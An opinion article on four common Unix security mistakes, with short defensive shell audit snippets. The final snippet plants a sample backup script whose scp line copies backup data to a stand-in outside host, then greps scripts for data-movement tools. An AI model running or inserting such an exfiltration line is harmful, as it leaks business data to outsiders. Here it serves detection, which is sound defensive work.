The four most common Unix security mistakes

Written by Paul Murphy, Contributor

Everybody talks about computer security as if the term had a clear meaning, but it doesn't. So, to be clear, what I mean by it here is the maintenance of information integrity in a system - something that's very difficult to define clearly but is essentially a matter of being able to assure senior management that things are working, and are likely to continue working, as they should.

Unix is critical to business operations in most of the companies and organizations I've looked at (no doubt in large part because 100% Wintel or mainframe shops don't call me), and most express some security-related concerns. In my experience, most such clients have evolved IT infrastructures balancing large numbers of Windows or mainframe people against relatively few Unix people, and have consequently tilted much of their procedural decision making toward policies appropriate to those environments - and, correspondingly, inappropriate to Unix.

As a result they very often institutionalize policies exemplifying one or more of what I think of as the four worst security strategies affecting Unix deployment in business and government.

#1: Using Windows to administer Unix

By a country mile the number one security problem affecting Unix is the use of a Windows workstation and/or laptop by the sysadmin.

I've seen dozens of cases, for example, in which policy calls for secure shell log-in and all kinds of fancy security bells, whistles, logs, and authorizations - but several people with root access carry around "promiscuous" laptops and no one really knows whether, or when, keyloggers get installed.

That's absurd, but the most common corollary decision is even worse. An overwhelming majority of large IT shops doing this also store their passwords in a network document - often using Excel or Word. Get access to the thing, and you have every password for every device on their network. And where is that file usually stored? You bet: on a Windows server, with unauthorized copies rejoicing in names like "passwords.doc" on every administrator PC and laptop in the place.
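If "passwords.doc" is sitting somewhere on shared storage, it's worth finding before an attacker does. A minimal sketch of that kind of sweep - the directory and filenames here are illustrative stand-ins for a mounted share, not anyone's real layout:

```shell
#!/bin/sh
# Illustrative stand-in for a mounted network share
share=$(mktemp -d)
touch "$share/passwords.doc" "$share/budget.xls"

# Sweep for plausibly named credential files; extend the patterns as needed
find "$share" -type f \( -iname '*password*' -o -iname '*passwd*' \) -print
```

On a real network you'd point this at the actual share mounts - and then ask why a flat file of root passwords exists at all.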


#2: Abandoning minimalism for convenience

Just about everybody does this - loading unneeded software on exposed servers, or implementing SANs and switches where they're not needed. Every piece of software you add to a system, whether running on the main processor or on associated gear, adds vulnerabilities. The rule is simple: if it's not necessary, don't load it, don't use it, and don't worry about it.
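The rule above lends itself to a simple recurring audit: keep an approved list of what should be enabled, and diff it against what actually is. A minimal sketch - the two input files are illustrative (in practice the enabled list would come from something like `systemctl list-unit-files --state=enabled` or the package database):

```shell
#!/bin/sh
# Hypothetical inputs: one service name per line, sorted
approved="approved-services.txt"
enabled="enabled-services.txt"

printf 'sshd\nsyslog\n'                   | sort > "$approved"
printf 'sshd\nsyslog\ncups\nbluetooth\n'  | sort > "$enabled"

# comm -13 prints lines found only in the second file:
# i.e. services enabled but never approved - candidates for removal
comm -13 "$approved" "$enabled"
```

Anything this prints is, by the minimalism rule, something to justify or delete.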

I've been in places that spend truckloads of cash on encryption, supervision, paper controls, and the latest in anti-intrusion and device management tools - and then cheerfully load everything on the DVDs that come with their Red Hat (or whatever) Enterprise Server licenses and hook it all up to totally unreviewed and unnecessary SAN, LAN, and WAN gear because, you know, "that's how we do things around here."


#3: Failing to practice preventative management

When it comes to the reliability and recovery components of systems integrity management most Unix managers talk a much better game than they play.

I don't think 1% of the people I've worked with have ever carried out an unscheduled systems interruption and recovery drill - just walk up to the most important server in the organization and pull the plug.

Cross-team training, unscheduled drills, and the granting of root-level systems control only to people with clearly defined server responsibilities - these are all basics of a preventative maintenance program - but an overwhelming majority of sites practice none of them.

Surprises will happen, and when they do the team that doesn't drill, won't be ready. I've been in places where thirty people in a half dozen rigidly separated organizational groups shared root access to big Unix servers. Everybody thought they needed control for their bit of the overall workload, but in the end no one could be held accountable when things failed - and the more people with root access, the more failures they cause.
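A first step toward accountability is simply knowing who holds root. A minimal sketch of one such check - counting UID-0 accounts in a passwd-format file (the sample data below is invented for illustration; on a live system you'd read /etc/passwd itself, and audit sudoers and group memberships too):

```shell
#!/bin/sh
# Invented sample standing in for /etc/passwd
sample=$(mktemp)
cat > "$sample" <<'EOF'
root:x:0:0:root:/root:/bin/sh
toor:x:0:0:second superuser:/root:/bin/sh
alice:x:1000:1000::/home/alice:/bin/sh
EOF

# Field 3 is the numeric UID; every UID-0 entry is a full superuser.
# More than one line of output should prompt questions.
awk -F: '$3 == 0 { print $1 }' "$sample"
```

If thirty people across six groups can become root, this check won't show it directly - but it's where the inventory starts.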


#4: Focusing where the risk isn't

Data centers are complex and technically stratified environments, but management tends to promote projects and people using the same technology the managers involved grew up with, while distrusting everything, and everyone, else. As a result the typical overweighting of Wintel or mainframe personnel in the modern data center acts like a lens focusing distrust on Unix and militating against taking effective action to secure non-Unix operations.

I see this all the time: management deploys tools and people to keep Solaris secure, while cheerfully trusting Windows patching, ignoring Cisco's gear, and blindly assuming the invulnerability of things like the RF systems in the warehouses or the guest WiFi devices providing DHCP services in the executive boardroom.

This happens on the organizational side too - with lots of emphasis on Solaris or Linux employee rotation while actual responsibility for primary application and server operations is diffused across numerous groups via server virtualization.

I have a favorite variation on this from a client which went to great lengths to secure their main servers - even insisting on a criminal records check for their Unix people. Meanwhile, the organization was dependent on a major third-party application that had been heavily customized by temporaries ("consultants") sold to them by the implementation services supplier - and no one had ever checked what all the scripts and stored procedures did. When I did, it turned out that the daily backup fired off a couple of odd processes that quietly copied critical daily updates to an outside party.
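Catching that kind of thing doesn't require forensics tools - a first pass is just grepping the batch scripts for anything that moves data off-host. A minimal sketch, using an invented script directory and a deliberately suspicious example file:

```shell
#!/bin/sh
# Invented directory standing in for wherever cron/batch scripts live
scripts=$(mktemp -d)
cat > "$scripts/nightly_backup.sh" <<'EOF'
#!/bin/sh
tar cf /backup/daily.tar /data
scp /backup/daily.tar user@outside.example.com:/incoming/
EOF

# List any script invoking common data-movement commands;
# every hit deserves a human read-through
grep -rlE '(scp|sftp|curl|wget|mailx)' "$scripts"
```

It's crude - it won't catch stored procedures or anything obfuscated - but it would have flagged that backup job on day one.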
